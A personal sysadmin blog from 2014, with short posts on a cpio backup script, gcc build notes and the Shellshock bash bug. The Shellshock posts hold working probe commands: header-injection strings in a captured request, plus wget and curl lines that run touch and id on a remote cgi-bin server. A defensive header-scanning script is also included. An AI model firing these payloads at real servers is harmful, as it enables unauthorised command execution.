Monday, September 29, 2014

thanks f5

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: () { :; }; ping -c 17
Host:() { :; }; ls -la 
Referer: () { :; }; ping -c 23

Thursday, September 25, 2014

with a rusty spoon

well kids. this just sucks donkey balls. get a shell and run:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
if you see "vulnerable" in the output, you're in for a bad trip.
it gets better. say you have cgi-bin enabled and aren't running in perl taint mode. run this:
wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi

and better.

curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi

with a rusty spoon.
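
For the defending side, the same `() {` prefix that opens every test string above (and the header values in the captured request in the "thanks f5" post) is easy to spot in a raw request. The script below is an added example, not code from the original posts. The function names, the host name and the sample request are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): flag HTTP request headers whose
# value begins with "() {", the prefix shared by every test string above.

# scan_headers: read one raw HTTP request on stdin and print
# "<header-name><TAB><value>" for each suspicious header.
scan_headers() {
    awk '
        NR == 1 { next }              # skip the request line
        { sub(/\r$/, "") }            # tolerate CRLF line endings
        $0 == "" { exit }             # blank line: headers are over
        {
            i = index($0, ":")
            if (i == 0) next          # not a "name: value" line
            name  = substr($0, 1, i - 1)
            value = substr($0, i + 1)
            sub(/^[ \t]+/, "", value) # "Host:() {" and "Host: () {" both match
            if (value ~ /^[(][)] [{]/) print name "\t" value
        }
    '
}

# sample_request: a constructed request with two probe headers, one header
# that merely contains "()" and a body line that must not be scanned.
sample_request() {
    printf '%s\r\n' \
        'GET /cgi-bin/status.cgi HTTP/1.1' \
        'Host: www.example.com' \
        'User-Agent: () { :;}; echo probe' \
        'Accept: text/html' \
        'Cookie:() { :; }; echo probe' \
        'Referer: http://www.example.com/()' \
        '' \
        'note: () { this is body text, not a header'
}

# Print the flagged headers of the constructed sample.
sample_request | scan_headers
```
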

Wednesday, September 24, 2014

simple cpio script

rsync is fine. but seeding a directory first is better. i like to do this on local private networks with cpio because the compression and security aren't really a concern.
thus, a simple, recursive cpio script. for dumping a local directory to an nfs mount.
echo start "$(date)" >> /var/log/cpio.log ;
find /home/ -depth -print0 | cpio -0pdumv /nfs/mount ;
echo end "$(date)" >> /var/log/cpio.log ;

Wednesday, September 17, 2014

install gcc notes

1) Get the desired version from SVN, e.g. from svn://
(To install SVN, see how to Work with SVN) 

2) Check that the config.sub and config.guess files are present in your gcc directory. If not, copy them into your unzipped gcc directory:

me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/install-sh .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.sub .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.guess .

3) Sample config for SUSE 10 Linux, x86_64

me@there:~/tools/gcc> mkdir objdir
me@there:~/tools/gcc> cd objdir
me@there:~/tools/gcc/objdir> ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local \
            --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 \
            --enable-languages=c,c++,objc,fortran,java,ada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.0 \
            --enable-ssp --disable-libssp --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib64 \
            --with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --without-system-libunwind \
            --with-cpu=generic --host=x86_64-suse-linux
Instructions on how to install GCC can be found here:


1) Search for an rpm package for your specific OS, e.g.:

2) You can make a symbolic link to the newly uploaded gcc in /usr/bin